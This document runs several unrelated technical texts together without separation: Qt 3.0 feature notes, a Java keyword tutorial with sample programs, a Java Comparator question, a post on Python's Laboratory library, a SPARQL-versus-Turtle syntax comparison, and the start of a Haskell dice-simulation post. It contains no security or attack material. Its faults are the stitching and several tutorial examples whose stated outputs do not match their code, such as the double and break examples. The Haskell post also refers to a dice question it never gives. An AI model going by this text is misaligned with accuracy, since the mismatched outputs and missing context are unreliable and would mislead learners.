For developers, dock windows behave just like ordinary widgets. QToolBar, for example, is now a specialized subclass of a dock window. The API of QMainWindow and QToolBar is source compatible with Qt 2.x, so existing code which uses these classes will continue to work. Qt has always provided regular expression support, but that support was pretty much limited to what was required in common GUI control elements such as file dialogs. Qt 3.0 introduces a new regular expression engine, QRegExp, that supports most of Perl's regex features and is Unicode based. The most useful additions are support for parentheses (capturing and non-capturing) and backreferences. Most programs will need to store some settings between runs, for example, user-selected fonts, colors and other preferences, or a list of recently used files. The new QSettings class provides a platform-independent way to achieve this goal. The API makes it easy to store and retrieve most of the basic data types used in Qt (such as basic C++ types, strings, lists, colors, etc). The class uses the registry on the Windows platform and traditional resource files on Unix. QProcess is a class that allows you to start other programs from within a Qt application in a platform-independent manner. It gives you full control over the started program; for example, you can redirect the input and output of console applications. Accessibility means making software usable and accessible to a wide range of users, including those with disabilities. In Qt 3.0, most widgets provide accessibility information for assistive tools that can be used by a wide range of disabled users. Qt standard widgets like buttons or range controls are fully supported. Support for complex widgets, such as QListView, is in development. Existing applications that make use of standard widgets will become accessible just by using Qt 3.0. Qt uses the Active Accessibility infrastructure on Windows, and needs the MSAA SDK, which is part of most platform SDKs.
With improving standardization of accessibility on other platforms, Qt will support assistive technologies on other systems, too. The XML framework introduced in Qt 2.2 has been vastly improved. Qt 2.2 already supported level 1 of the Document Object Model (DOM), a W3C standard for accessing and modifying XML documents. Qt 3.0 has added support for DOM Level 2 and XML namespaces. The XML parser has been extended to allow incremental parsing of XML documents. This allows you to start parsing the document directly after the first parts of the data have arrived, and to continue whenever new data is available. This is especially useful if the XML document is read from a slow source, e.g. over the network, as it allows the application to start working on the data at a very early stage. SVG is a W3C standard for "Scalable Vector Graphics". Qt 3.0's XML support means that QPicture can optionally generate and import static SVG documents. All the SVG features that have an equivalent in QPainter are supported. Many professional applications, such as DTP and CAD software, are able to display data on two or more monitors. In Qt 3.0 the QDesktopWidget class provides the application with runtime information about the number and geometry of the desktops on the different monitors and thus allows applications to efficiently use a multi-monitor setup. The virtual desktop of Mac OS X, Windows 98, and 2000 is supported, as well as the traditional multi-screen and the newer Xinerama multihead setups on X11. Qt 3.0 now complies with the NET WM Specification, recently adopted by KDE 2.0. This allows easy integration and proper execution with desktop environments that support the NET WM specification. The font handling on X11 has undergone major changes. QFont no longer has a one-to-one relation with window system fonts. QFont is now a logical font that can load multiple window system fonts to simplify Unicode text display.
This completely removes the burden of changing/setting fonts for a specific locale/language from the programmer. For end-users, any font can be used in any locale. For example, a user in Norway will be able to see Korean text without having to set their locale to Korean. Qt 3.0 also supports the new render extension recently added to XFree86. This adds support for anti-aliased text and pixmaps with alpha channel (semi-transparency) on the systems that support the rendering extension (at the moment XFree 4.0.3 and later). Printing support has been enhanced on all platforms. The QPrinter class now supports setting a virtual resolution for the painting process. This makes WYSIWYG printing trivial, and also allows you to take full advantage of the high resolution of a printer when painting on it. The PostScript driver built into Qt and used on Unix has been greatly enhanced. It supports the embedding of TrueType, OpenType and Type 1 fonts into the document, and can correctly handle and display Unicode. Support for fonts built into the printer has been enhanced and Qt now knows about the most common printer fonts used for Asian languages. The new QHttp class provides a simple interface for HTTP downloads and uploads. Support for the C++ Standard Template Library has been added to the Qt Template Library (QTL). The QTL classes now contain appropriate copy constructors and typedefs so that they can be freely mixed with other STL containers and algorithms. In addition, new member functions have been added to QTL template classes which correspond to STL-style naming conventions (e.g., push_back()). Qt Designer was a pure dialog editor in Qt 2.2 but has now been extended to provide the full functionality of a GUI design tool. This includes the ability to lay out main windows with menus and toolbars. Actions can be edited within Qt Designer and then plugged into toolbars and menu bars via drag and drop.
Splitters can now be used in a way similar to layouts to group widgets horizontally or vertically. In Qt 2.2, many of the dialogs created by Qt Designer had to be subclassed to implement functionality beyond the predefined signal and slot connections. Whilst the subclassing approach is still fully supported, Qt Designer now offers an alternative: a plugin for editing slots. The editor offers features such as syntax highlighting, completion, parentheses matching and incremental search. The functionality of Qt Designer can now be extended via plugins. Using Qt Designer's interface or by implementing one of the provided interfaces in a plugin, a two-way communication between plugin and Qt Designer can be established. This functionality is used to implement plugins for custom widgets, so that they can be used as real widgets inside the designer. Basic support for project management has been added. This allows you to read and edit *.pro files, add and remove files to/from the project and do some global operations on the project. You can now open the project file and have one-click access to all the *.ui forms in the project. Qt Linguist is a GUI utility to support translating the user-visible text in applications written with Qt. It comes with two command-line tools: lupdate and lrelease. Translation of a Qt application is a three-step process. Qt Linguist is a tool suitable for use by translators. Each user-visible (source) text is characterized by the text itself, a context (usually the name of the C++ class containing the text), and an optional comment to help the translator. The C++ class name will usually be the name of the relevant dialog, and the comment will often contain instructions that describe how to navigate to the relevant dialog. You can create phrase books for Qt Linguist to provide common translations to help ensure consistency and to speed up the translation process.
Whenever a translator navigates to a new text to translate, Qt Linguist uses an intelligent algorithm to provide a list of possible translations: the list is composed of relevant text from any open phrase books and also from identical or similar text that has already been translated. Once a translation is complete it can be marked as "done"; such translations are included in the *.qm file. Text that has not been "done" is included in the *.qm file in its original form. Although Qt Linguist is a GUI application with dock windows and mouse control, toolbars, etc., it has a full set of keyboard shortcuts to make translation as fast and efficient as possible. When the Qt application that you're developing evolves (e.g. from version 1.0 to version 1.1), the utility lupdate merges the source texts from the new version with the previous translation source file, reusing existing translations. In some typical cases, lupdate may suggest translations. These translations are marked as unfinished, so you can easily find and check them. Thanks to the positive feedback we received about the help system built into Qt Designer, we decided to offer this part as a separate application called Qt Assistant. Qt Assistant can be used to browse the Qt class documentation as well as the manuals for Qt Designer and Qt Linguist. It offers index searching, a contents overview, bookmarks, history and incremental search. Qt Assistant is used by both Qt Designer and Qt Linguist for browsing their help documentation. To ease portability we now provide the qmake utility to replace tmake. qmake is a C++ version of tmake which offers additional functionality that is difficult to reproduce in tmake. Trolltech uses qmake in its build system for Qt and related products and we have released it as free software.
- To learn the different keywords in Java and their implementations, follow the steps given below:
- Java has the following keywords: enum, abstract, boolean, char, int, float, byte, case, break, finally, default, do, if, else, for, continue, while, switch, short, long, return, double, private, public, protected, package, try, catch, throw, throws, void, const, this, super, static, synchronized, new, implements, instanceof, extends, class, volatile, transient, strictfp, assert, native, interface, import.
- Reserved words and literals: true, false, null, goto. (goto and const are reserved but unused; true, false and null are literals rather than keywords.)
- Here is the explanation of the keywords:
- abstract: An abstract class or method is declared with the keyword abstract. An abstract class can be extended but cannot be instantiated. If a subclass of an abstract class does not implement the abstract methods of its superclass, the subclass is also abstract.
- boolean: A boolean variable holds only the values true or false. A boolean cannot be converted to a numeric value. This is a primitive data type, and its default value is false.
- char: A char variable stores a single Unicode character; the char keyword can also declare a method's return type. It is 16 bits in size. Common escape sequences are:
\" - double quote
\\ - backslash
\f - form feed
\' - single quote
\n - newline
\b - backspace
- int: A 32-bit primitive integer type. The wrapper class Integer defines the constants MIN_VALUE and MAX_VALUE, which represent the range of values of the int type. int values can be negative, positive or zero.
- float: This is a Java primitive type. Its size is 32 bits and its default value is 0.0f.
- byte: A byte is an 8-bit integer value. It can store integer values in the range -128 to 127. The default value is 0.
- short: The size of the short data type is 16 bits. Its minimum value is -32,768 and its maximum value is 32,767. It is a Java primitive data type whose default value is 0. A short is half the size of an int.
- long: This is a Java primitive type. The size of the long data type is 64 bits. Its minimum value is -2^63 and its maximum value is 2^63-1.
The default value is 0L. This type is used when a larger range than int is needed.
- double: This is a Java primitive type that stores a 64-bit floating-point value.
- break: The break keyword is used to exit a for, while or do loop, or to end a case block in a switch statement.
- continue: continue skips the rest of the current iteration of a do, while or for loop and proceeds to the next one.
- try, catch, finally: A try block encloses code that may throw an exception. Every try block must have one or more catch blocks or a finally block. The catch keyword catches an exception thrown from the try block; each catch block handles a particular type of exception. The finally keyword defines a block that is always executed at the end of a try/catch statement: after the try block runs, the finally block executes whether or not an exception occurred, and even if a problem occurs while executing a catch block.
- do: A do loop body is always executed at least once. A semicolon is always required after the conditional expression.
- while: This keyword indicates that the loop body is executed repeatedly as long as the condition is true.
- if, else: if is used for executing conditional statements. An if statement may have an optional else block containing the code that is executed when the condition is false. The else keyword is always used together with if.
- switch, case, default: The switch keyword selects one of several code blocks for execution based on an expression. To exit the switch statement, a break statement must be included at the end of each block. A case does not have an implicit ending point.
A break keyword must typically be used at the end of each case block to exit the switch statement. Without a break statement, execution falls through into the following cases and finally into the default block. Within a switch, default marks the branch executed when none of the defined cases match. (Separately, "default access" describes what happens when no access modifier is given: such a member is accessible only within its own package.)
- void, return: When a method does not return any value, the void keyword is used as its return type; a void method returns nothing. The return keyword returns a value from a method; parentheses surrounding the return value are optional.
- private: This keyword is an access control modifier. It can be applied to a method, a field or a constructor. It is the most restrictive access level: a private method, variable or constructor cannot be accessed from outside its class.
- public: The public keyword declares a class, method or field as public, meaning it can be accessed from anywhere: within the same class, within the same package, from subclasses outside the package, and from any other package. It is the least restrictive access level.
- protected: A protected member is accessible within its class, within its package, and from subclasses outside the package. It is not otherwise accessible outside the package.
- package: The package keyword declares a Java package. When a source file does not contain a package statement, the classes defined in the file belong to the default package.
- throw: This keyword is used to explicitly throw an exception, and is used within a method body. We cannot throw multiple exceptions at a time. The throw keyword works with checked as well as unchecked exceptions.
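The switch/case/default and break behaviour described above can be shown in a small runnable sketch; the class and method names here are illustrative, not from the original tutorial:

```java
public class SwitchDemo {
    // Classifies a day number; default handles every unmatched case.
    public static String dayType(int day) {
        String result;
        switch (day) {
            case 6:    // no break here, so case 6 falls through to case 7
            case 7:
                result = "weekend";
                break; // break exits the switch
            default:
                result = "weekday";
                break;
        }
        return result;
    }

    public static void main(String[] args) {
        System.out.println(dayType(3)); // weekday
        System.out.println(dayType(7)); // weekend
    }
}
```

Removing the break after "weekend" would make execution fall through into the default block, which is exactly the pitfall the text warns about.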
- throws: The throws keyword is mainly used with checked exceptions. throws is declared in the method signature and lists the exceptions the method may throw.
- const: const is reserved in Java but has no use and cannot appear in programs. To define a constant, declare a variable final: once assigned, a final variable cannot be altered.
- this: this refers to the current object. When there is ambiguity between a parameter and an instance variable, the this keyword resolves it. It is a special keyword in Java.
- super: super is a special keyword in Java, used inside a subclass to refer to its superclass, for example to call superclass methods and constructors that are visible to the subclass.
- new: The new keyword creates an array object or an instance of a class, allocating memory dynamically. You can also use new to create a simple Java object.
- static: Static variables are known as class variables. When you define a variable as static, only one copy of it is created in JVM memory, and that single copy is shared by all instances of the class. In Java, the static keyword helps with memory management, since static variables can save memory.
- extends: The extends keyword is used in a class declaration to name the superclass, and in an interface declaration to name one or more superinterfaces. A class may extend only one other class. extends is the keyword used in Java's inheritance mechanism: the subclass gains the methods and variables of the extended class.
- class: The class keyword defines a class. The class body is enclosed in curly braces, within which variables and methods are declared.
- import: The import keyword is used in Java to import user-defined and built-in packages into a Java source file, so that your class can refer to a class in another package by its simple name.
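The exception keywords explained above (throw, throws, try, catch, finally) work together; here is a minimal sketch, with invented names, showing a checked exception being declared, thrown, caught and followed by a finally block:

```java
public class ExceptionDemo {
    // throws declares the checked exception; throw raises it explicitly.
    static void checkAge(int age) throws Exception {
        if (age < 18) {
            throw new Exception("under age");
        }
    }

    // Returns a small log string so the control flow is visible.
    public static String run(int age) {
        String log = "";
        try {
            checkAge(age);          // may throw
            log += "ok";
        } catch (Exception e) {
            log += "caught:" + e.getMessage();
        } finally {
            // finally runs whether or not an exception occurred
            log += "|finally";
        }
        return log;
    }

    public static void main(String[] args) {
        System.out.println(run(15)); // caught:under age|finally
        System.out.println(run(30)); // ok|finally
    }
}
```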
- implements: The implements keyword declares the interfaces that are implemented by a class, and is used in the class definition. One class may implement multiple interfaces, which is how Java supports a form of multiple inheritance (of type).
- interface: An interface is a special type whose body contains only constant fields and abstract methods (prior to Java 8). Interfaces are declared with the interface keyword. An interface cannot be instantiated, only implemented.
- synchronized: This keyword ensures that a method or block can be executed by only one thread at a time. It can be applied to methods and blocks, not to variables or classes.
- volatile: A volatile member variable may be modified asynchronously by more than one thread; the keyword forces reads and writes of that variable to go to main memory.
- instanceof: This keyword tests the runtime class of an object. It produces a boolean result.
- transient: This can only be applied to fields (member variables). A transient variable is not saved when an object is serialized. It gives you some control over the serialization process and the flexibility to exclude some object properties from it.
- strictfp: The strictfp keyword forces floating-point calculations to follow strict IEEE 754 semantics, which ensures portable (platform-independent) results. It applies to classes, interfaces and methods, not to variables. Declare the strictfp modifier when you need identical floating-point results on every platform.
- assert: You can define an assert statement with the help of the assert keyword. It is used to test your assumptions about the program: an assertion is expected to be true when it executes. If it fails, the JVM throws an error named AssertionError. It is mainly used for testing purposes.
- native: This keyword is applied only to methods, not to variables or classes, and marks a method implemented in platform-native code.
- enum: This is a type whose fields consist of a fixed set of constants.
It extends the parent class Enum and can implement interfaces. We cannot create an instance of an enum with the new operator; in Java the constructor of an enum is always private, and the constants of an enum are implicitly final and static.
- for: This is a pretest loop statement with an initialization expression, a boolean condition and an increment expression. When the loop is executed, the initialization expression is evaluated first; it assigns the initial value to the loop control variable (e.g. j=1). The boolean expression, frequently a comparison (j<=10), is tested at the start of each iteration, and the loop terminates when it becomes false. After each iteration the increment expression is evaluated, updating the control variable (e.g. j++).
- Explanation of reserved words:
- true: A boolean literal representing the true value.
- false: A boolean literal representing the false value.
- null: This literal represents "no value". null cannot be assigned to variables of primitive type (boolean, byte, char, double, float, int, long, short).
- goto: goto is reserved in Java but has no function; unlike in some other languages, it cannot be used to jump to another line of code.
- Hence, we have successfully learnt the different keywords in Java and their implementations.

Syntax :
public abstract class MyDemo {
}

Example : This example shows the use of the abstract keyword.

abstract class J { // declare class as abstract
    abstract void display(); // abstract method: declared without a body
}

class K extends J { // concrete subclass of the abstract class
    void display() { // implement the abstract method
        System.out.println("This is abstract program!"); // print statement
    }

    public static void main(String[] args) { // main method
        K k = new K(); // create object
        k.display(); // call method
    }
}

Output :
This is abstract program!
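The for statement described above (initialization j=1, condition j<=10, increment j++) can be turned into a runnable sketch; the class and method names are illustrative:

```java
public class ForDemo {
    // Sums 1..10: the initialization runs once, the condition is tested
    // before each iteration, and the increment runs after each iteration.
    public static int sumToTen() {
        int sum = 0;
        for (int j = 1; j <= 10; j++) {
            sum += j;
        }
        return sum;
    }

    public static void main(String[] args) {
        System.out.println(sumToTen()); // 55
    }
}
```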
Syntax :
boolean val = true;
if (val) {
    // statement
}
Example : This example shows the use of the boolean keyword
public class JavaBlnSample
{
    public static void main (String [] args) // main method
    {
        // create a Boolean object from a boolean value
        Boolean Ob1 = new Boolean (true);
        /* create a Boolean object from a string: the value is true only if
           the string equals "true" (ignoring case), false otherwise */
        Boolean Ob2 = new Boolean ("false");
        // print the values of both Boolean objects
        System.out.println (Ob1);
        System.out.println (Ob2);
    }
}
Output :
true
false
Example : This example shows how to declare and use a Java primitive char variable inside a class.
public class Char // create class
{
    public static void main(String[] args) // main method
    {
        // define char variables
        char c1 = 'p';
        char c2 = 80; // 80 is the ASCII code of 'P'
        System.out.println ("Value of char variable c1 is:" + c1);
        System.out.println ("Value of char variable c2 is:" + c2);
    }
}
Output :
Value of char variable c1 is: p
Value of char variable c2 is: P
Example : This example shows how to declare and use a Java primitive int variable inside a class.
public class Int
{
    public static void main(String[] args)
    {
        // here assigning a default value is optional
        // declare integers a and b
        int a = 16;
        int b = 101;
        // print the values of variables a and b
        System.out.println ("Value of int variable a is:" + a);
        System.out.println ("Value of int variable b is:" + b);
    }
}
Output :
Value of int variable a is: 16
Value of int variable b is: 101
Example : This example shows how to declare and use a Java primitive float variable inside a class.
public class Float
{
    public static void main(String[] args)
    {
        float f = 14.3f; // declare a float value
        System.out.println ("Value of float variable f is:" + f); // print value
    }
}
Output : Value of float variable f is: 14.3
Example : This example shows how to declare and use a Java primitive byte variable inside a class.
public class Byte
{
    public static void main(String[] args)
    {
        // assign byte values to variables a and b
        byte a = 43;
        byte b = 14;
        // print the values of a and b
        System.out.println ("Value of byte variable a is:" + a);
        System.out.println ("Value of byte variable b is:" + b);
    }
}
Output :
Value of byte variable a is: 43
Value of byte variable b is: 14
Example : This example shows how short is used in a program.
public class Short
{
    public static void main(String[] args)
    {
        // assign short values to variables i and j
        short i = 18;
        short j = 35;
        // print the values of i and j
        System.out.println ("Value of short variable i is:" + i);
        System.out.println ("Value of short variable j is:" + j);
    }
}
Output :
Value of short variable i is: 18
Value of short variable j is: 35
Example : This example shows how an object of Long can be declared and used.
public class LongProgram
{
    public static void main(String[] args)
    {
        // create a Long object from a long
        long l = 46;
        Long lObj = new Long (l);
        // print the value of the Long object
        System.out.println (lObj);
    }
}
Output : 46
Example : This example shows how to use double in a class.
public class JavaDouble
{
    public static void main(String[] args)
    {
        double d = 1643.43; // declare a double value in variable d
        // print the value of the double
        System.out.println ("Value of double variable d is:" + d);
    }
}
Output : 1643.43
Example : This example shows how to break out of a loop or condition in a class.
public class Break
{
    public static void main(String[] args)
    {
        int j, k;
        System.out.println ("Numbers between 1 and 8 :");
        /* the outer loop runs j from 1 to 7; the inner loop runs k from 2
           up to j, and breaks out as soon as j + k equals 6 */
        for (j = 1; j < 8; j++)
        {
            for (k = 2; k < j; k++)
            {
                if (j + k == 6)
                {
                    break; // leave the inner loop when the condition is true
                }
            }
            if (j == k) // j == k only when the inner loop was not exited by break
            {
                System.out.println (" " + j);
            }
        }
    }
}
Output :
Numbers between 1 and 8 :
2 3 5 6 7
Example : This example shows how to use the continue statement to skip an iteration of the loop.
public class Continue
{
    public static void main(String args[])
    {
        // declare an array of integers
        int [] num = {1, 14, 9, 16, 5, 7};
        for (int a : num) // iterate over the values in num
        {
            // if a equals 16, skip it and continue with the next value
            if (a == 16)
            {
                continue;
            }
            System.out.println (a); // print statement
        }
    }
}
Output :
1 14 9 5 7
Example : This example shows how to use try, catch and finally in a class.
public class Try
{
    public static void main(String args[])
    {
        int a = 10;
        int b = 5;
        try // code that throws the exception
        {
            int x = a / (b - b); // division by zero happens here
        }
        catch (ArithmeticException e) // catch the exception
        {
            System.out.println ("Division by zero");
        }
        finally // the finally block always runs
        {
            int y = a / b;
            System.out.println ("y = " + y); // print output
        }
    }
}
Output :
Division by zero
y = 2
Example : This example shows how to use a do-while loop to iterate in a Java program.
public class DoWhile
{
    public static void main(String[] args)
    {
        // the condition is checked after executing the loop body, so the
        // loop runs at least once even if the condition is false
        int a = 0; // declare an int value in variable a
        do // start the do loop
        {
            System.out.println ("a is : " + a); // print a
            a++; // increment a by 1
        } while (a < 4); // the body repeats while the condition is true
    }
}
Output :
a is : 0
a is : 1
a is : 2
a is : 3
Example : This example shows how the while keyword is used in a class.
public class While // create class
{
    public static void main(String args[]) // main method
    {
        int num = 16; // define integer num
        while (num < 20) // loop while num is less than 20
        {
            System.out.println ("Value of num:" + num); // print statement
            num++; // increment num by one
        }
    }
}
Output :
Value of num: 16
Value of num: 17
Value of num: 18
Value of num: 19
Example : This example shows how an if-else statement is used in a class.
public class IfElse // note: a class name may not contain a hyphen
{
    public static void main (String [] args) // main method
    {
        int a = 16;
        if (a > 100) // check whether a is greater than 100
            System.out.println ("a is greater than 100");
        else if (a > 50) // otherwise check whether a is greater than 50
            System.out.println ("a is greater than 50");
        else // otherwise a is at most 50
            System.out.println ("a is less than 50");
        System.out.println ("a=" + a);
    }
}
Output :
a is less than 50
a=16
Example : This example shows how to use switch-case and default in a class.
class Switch // create class Switch
{
    public static void main(String[] args) // main method
    {
        int day = 4; // the 4th day of the week
        switch (day) // control jumps to the matching case
        {
            // break ends each case so execution does not fall through
            case 1: System.out.println("Monday"); break;
            case 2: System.out.println("Tuesday"); break;
            case 3: System.out.println("Wednesday"); break;
            case 4: System.out.println("Thursday"); break;
            case 5: System.out.println("Friday"); break;
            case 6: System.out.println("Saturday"); break;
            // if day matches no case, the default branch prints Sunday
            default: System.out.println("Sunday"); break;
        }
    }
}
Output : Thursday
Example : This example shows how to write void and return in a class.
public class Return
{
    // declare static integers
    static int a = 5;
    static int b = 11;
    public static void main(String[] args) // the return type of main is void
    {
        System.out.println (a + b); // print the sum of a and b
        return; // return simply exits the method; a void method returns no value
    }
}
Output : 16
Example :
private void method ();
Example : This example shows how to use public in a class.
// Save as First.java
package Topic1; // class First lives in package Topic1
public class First // create class First
{
    public void msg()
    {
        System.out.println ("This is Public modifier");
    }
}
// Save as Second.java
package Topic; // create new package
import Topic1.*; // import package Topic1
class Second // create class Second
{
    public static void main(String args[]) // main method
    {
        First obj = new First (); // create object of class First
        obj.msg (); // call method of class First
    }
}
Output : This is Public modifier
Example : This example shows how to use protected in a class.
// In the same project create a new class and save it as First.java
public class First // create class First
{
    protected void msg() // declare method as protected
    {
        System.out.println ("This is protected"); // print statement
    }
}
// In the same project create another class and save it as Second.java
class Second extends First // extends class First
{
    public static void main(String args[]) // main method
    {
        Second obj = new Second (); // create object of class Second
        obj.msg ();
    }
}
Output : This is protected
Example :
package com.mypack;
public class MyFavourite { }
Example : This example shows how to use static and new in a class.
public class Stud // create class
{
    int rolno; // define integer
    String name; // define strings
    String address;
    static String division = "A"; // define a static variable
    // define a constructor with parameters
    Stud (int rn, String nm, String adds)
    {
        rolno = rn;
        name = nm;
        address = adds;
    }
    void display() // method declaration
    {
        System.out.println (rolno + " " + name + " " + address + " " + division);
    }
    public static void main(String[] args) // start execution
    {
        // create objects with the new keyword
        Stud s1 = new Stud (101, "Pooja", "Vashi");
        Stud s2 = new Stud (102, "Shilpa", "Sanpada");
        s1.display (); // call method
        s2.display (); // call method
    }
}
Output :
101 Pooja Vashi A
102 Shilpa Sanpada A
Example : This example shows how to use extends in a class.
// In the same project create two classes; save the first as ParentEx.java
public class ParentEx
{
    public String n1 = null;
    public String n2 = null; // define strings
    public void printOut() // declare method
    {
        System.out.println ("Output of First:" + n1);
        System.out.println ("Output of Second:" + n2);
    }
}
// In the same project create a new class and save it as ChildEx.java
public class ChildEx extends ParentEx // extends the parent class
{
    public void parentMeth()
    {
        n1 = "Hi this is First";
        n2 = "This is Second class where extends used";
        printOut ();
    }
    public static void main (String[] args)
    {
        ChildEx ce = new ChildEx (); // object creation
        ce.parentMeth (); // call method
    }
}
Output :
Output of First: Hi this is First
Output of Second: This is Second class where extends used
Example :
class MyHome // create class
{
    int num; // define integer
    void display() // declare method
    {
        System.out.println ("num"); // print statement
    }
}
Output : num
Example :
interface Ani { } // declare an interface for the example
class Maml implements Ani { }
class Cat extends Maml
{
    public static void main (String [] args)
    {
        Maml m = new Maml (); // create object of Maml
        Cat c = new Cat (); // create object of Cat
        // instanceof produces a boolean result
        System.out.println (m instanceof Ani);
        System.out.println (c instanceof Maml);
        System.out.println (c instanceof Ani);
    }
}
Output :
true
true
true
Example : This example shows how to use a for loop in a class.
public class ForLoop
{
    public static void main(String[] args)
    {
        // initialization is executed only once;
        // the loop runs while the condition is true
        for (int num = 0; num <= 2; num++)
            System.out.println ("Number is : " + num); // print the value of num
    }
}
Output :
Number is : 0
Number is : 1
Number is : 2
Something about implementing the Comparator interface isn't very clear to me: overriding the compare method. Like here, for example:
Code :
// This sorts a list of objects holding information based on age: the name and the age of the person
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;

public class Person {
    String name;
    int age;

    public Person (String name, int age) {
        this.name = name;
        this.age = age;
    }

    public String getName() {
        return name;
    }

    public int getAge() {
        return age;
    }

    public String toString() {
        return name + " \t " + age;
    }

    // static, so that it can be instantiated as Person.SomeComparator below
    static class SomeComparator implements Comparator<Person> // Why use Person for generics?
    {
        public int compare(Person pers1, Person pers2) {
            int age1 = pers1.getAge();
            int age2 = pers2.getAge();
            if (age1 == age2) {
                return 0;
            } else if (age1 > age2) {
                return 1;
            } else {
                return -1;
            }
        }
    }

    public static void main(String[] args) {
        ArrayList<Person> list1 = new ArrayList<Person>();
        list1.add(new Person("Judy", 18));
        list1.add(new Person("Alex", 29));
        list1.add(new Person("Jared", 14));
        Collections.sort(list1, Collections.reverseOrder(new Person.SomeComparator()));
        System.out.println(list1);
    }
}
What exactly is happening behind the scenes? I mostly don't understand the part where it returns a 0, a 1, or a -1. After it returns one of those values, what really happens next? For the displaying of the list, is the toString() method being accessed to output the list in the System.out.println statement? For the generics, why do we use Person? That's a lot of questions, I know, but it is really important for me to get the hang of this. If you could add more key explanations beyond those that answer my questions above (I might have missed something else), it would be really appreciated! Thank you in advance! :)
Experiment to safely refactor your code in Python "Will my refactoring break my code ?" is the question the developer asks himself because he is not sure the tests cover all the cases. He should wonder, because tests that cover all the cases would be costly to write, run and maintain. Hence, most of the time, small decisions are made day after day to test this and not that. After some time, you could consider that in a sense, the implementation has become the specification and the rest of the code expects it not to change. Enters Scientist, by GitHub, that inspired a Python port named Laboratory. Let us assume you want to add a cache to a function that reads data from a database. The function would be named read_from_db, it would take an int as parameter item_id and return a dict with attributes of the items and their values. You could experiment with the new version of this function like so: import laboratory def read_from_db_with_cache(item_id): data = {} # some implementation with a cache return data @laboratory.Experiment.decorator(candidate=read_from_db_with_cache) def read_from_db(item_id): data = {} # fetch data from db return data When you run the above code, calling read_from_db returns its result as usual, but thanks to laboratory, a call to read_from_db_with_cache is made and its execution time and result are compared with the first one. These measurements are logged to a file or sent to your metrics solution for you to compare and study. In other words, things continue to work as usual as you keep the original function, but at the same time you experiment with its candidate replacement to make sure switching will not break or slow things down. I like the idea ! Thank you for Scientist and Laboratory that are both available under the MIT license.
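To make the decorator flow described above concrete, here is a simplified, self-contained sketch of what such an experiment framework does behind the scenes: run the control, run the candidate, compare results and timings, and always return the control's result. This is an illustration of the concept only, not Laboratory's actual implementation; the `experiment` decorator and the two `read_from_db*` bodies here are hypothetical stand-ins.

```python
import time

def experiment(candidate):
    """Toy stand-in for an experiment decorator: NOT Laboratory's real API."""
    def decorator(control):
        def wrapper(*args, **kwargs):
            t0 = time.perf_counter()
            expected = control(*args, **kwargs)        # the trusted code path
            control_s = time.perf_counter() - t0
            try:
                t0 = time.perf_counter()
                observed = candidate(*args, **kwargs)  # the new code path
                candidate_s = time.perf_counter() - t0
                match = observed == expected
            except Exception:
                match, candidate_s = False, None       # candidate errors never escape
            # A real framework would publish these measurements to logs or metrics.
            print("match=%s control=%.6fs candidate=%s" % (match, control_s, candidate_s))
            return expected                            # callers always see the control's result
        return wrapper
    return decorator

def read_from_db_with_cache(item_id):
    return {"id": item_id}   # pretend: implementation with a cache

@experiment(candidate=read_from_db_with_cache)
def read_from_db(item_id):
    return {"id": item_id}   # pretend: fetch data from the database

result = read_from_db(7)
print(result)
```

Because the wrapper always returns the control's result, callers behave exactly as before while the candidate is measured in the background, which is the essential safety property of this pattern.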
Diff SPARQL Turtle This page gathers together difference between SPARQL 1.0 and Turtle. See also: Contents Relevant RDF WG Decisions - Resolution of ISSUE-18 - Dots inside prefix names (either namespace or local part) See also: - Mark xs:string as archaic, recommend that systems silently convert xs:string data to plain literals. Decimals 18. is changed to 18.0 ] . [ :p 3 ; :q 4 ] } SELECT * { [ :p 1 ; :q 2 ] } RDF Collections A less frequent case is a free-standing lists and subject lists. (1 2 3 4) . SELECT * { (1 ?x 3 4) . } SELECT * { (1 2) rdfs:comment "List" } Turtle allows (1 2 3 4) rdfs:comment "List" . but not (1 2 3 4) . Trailing dots A final DOT is not required in SPARQL: INSERT DATA { :s :p :o } SELECT * WHERE { ?z a foaf:Person ; foaf:name ?name ; foaf:knows [ foaf:name ?name2 ] } This is more significant when TriG is considered. Strings Using ' and ''' for string quoting is legal in SPARQL. Because SPARQL queries can be embedded in programs, allowing a character that does not require programming language quoting is useful. Added in the Turtle working draft (v 1.13): String production. Added in the Turtle working draft (v 1.13): PN_LOCAL token. Escape Processing Turtle and SPARQL treat \u escape processing differently. SPARQL Codepoint Escape Sequences defines \u processing to happen on the input stream charcater stream before the grammar is applied. \u esacpes are converted to the codepoint and any significant characters (e.g. delimiter ") apply as usual. Turtle String Escapes happen after parsing, and only in strings and IRI references. Significant characters do not delimit. Does not apply to prefixed names. Legal and the same in both (for different reasons): "\u03B1" # "α" Codepoint x03B1 is Greek small alpha <ab\u00E9xy> # Codepoint 00E9 is Latin small e with acute - é Legal in both but different: #\u0020Comment Legal SPARQL, illegal in Turtle (see extension below): a:\u03B1 Legal SPARQL, illegal in Turtle: uses a syntax-significant character. 
a\u003Ab # a:b -- codepoint x3A is colon Legal in Turtle, illegal in SPARQL "ab\u0022cd" # x22 is " Possible extension to Turtle Adding a UCHAR to the qname characters enables \u03B1:a, per yacker results for @prefix α: <> . <ab\u00E9xy> \u03B1:p "ab\u0022cd" .
Introduction
Chapter 2 of David MacKay's excellent book Information Theory, Inference, and Learning Algorithms is a general introduction to probability. One of the examples asks about some dice-rolling; the specific questions are quoted part by part below.
When I first encountered this, I found it quite hard to tackle, because it's one of those problems which is almost trivial if you look at it in the right way, but hard otherwise. The key is to educate your intuition so that you do indeed see it from the right perspective.
I don't remember how I tackled it in the past, but when I was discussing it recently, it struck me as a nice thing to simulate, and my favourite language for such things is Haskell.
Random Numbers in Haskell
In many languages, you can generate a random number by calling a function, e.g. in Python we might simulate a couple of dice-rolls thus:
>>> random.randint(1, 6)
2
>>> random.randint(1, 6)
6
Pedantically this generates a pseudo-random number, and behind the function call there's some hidden state so that repeated calls return different results.
Haskell's idea of a function is much closer to the mathematical one: in particular functions are pure, which means that if we call a function again with the same arguments we'll get the same result. We could proceed by explicitly passing the state of the random number generator around. However, Haskell is lazy and so copes well with infinite lists. So, we can define an infinite list of random rolls, happy in the knowledge that the samples will only be generated as they're needed. Once defined, we can pass the infinite list of rolls around just like any other list. The code which analyses the sequence knows nothing about randomness: it just sees the numbers.
Happily the System.Random package contains all the code we need to generate the list:
ghci> import System.Random
ghci> let rolls = randomRs (1,6) . mkStdGen
ghci> take 10 $ rolls 42
[6,4,2,5,3,2,1,6,1,4]
ghci> sum .
take 100000 $ rolls 42
350050
The key remaining difference is that we have to specify an explicit seed (here 42). In other languages this often defaults to some external source of entropy, e.g. the system clock.
